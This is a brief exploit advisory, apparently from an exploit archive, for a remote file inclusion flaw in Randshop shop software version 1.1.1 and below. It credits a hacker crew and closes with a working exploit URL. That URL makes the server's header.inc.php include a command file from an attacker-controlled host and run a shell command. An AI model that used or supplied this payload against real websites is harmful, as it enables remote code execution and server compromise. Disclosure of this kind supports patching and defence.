Randshop versions 1.1.1 and below are susceptible to a remote file inclusion vulnerability.
13fe55d24d7aea5b1f7040c9422f39a0f8ed7e51784bd0b41b118e0f38ed181e
Title : randshop Remote File Inclusion Vulnerability
-
URL : http://www.randshop.com/
-
Author : OLiBekaS
-
contact : olibekas[at]gmail.com
-
greetz : Renzokuzen,sikunYuk, Skulmatic, weleh, brokencode, bigmaster and all #papmahackerlink crew
-
Exploit : http://[target]/[path]//includes/header.inc.php?dateiPfad=http://[attacker]/cmd.txt?&cmd=ls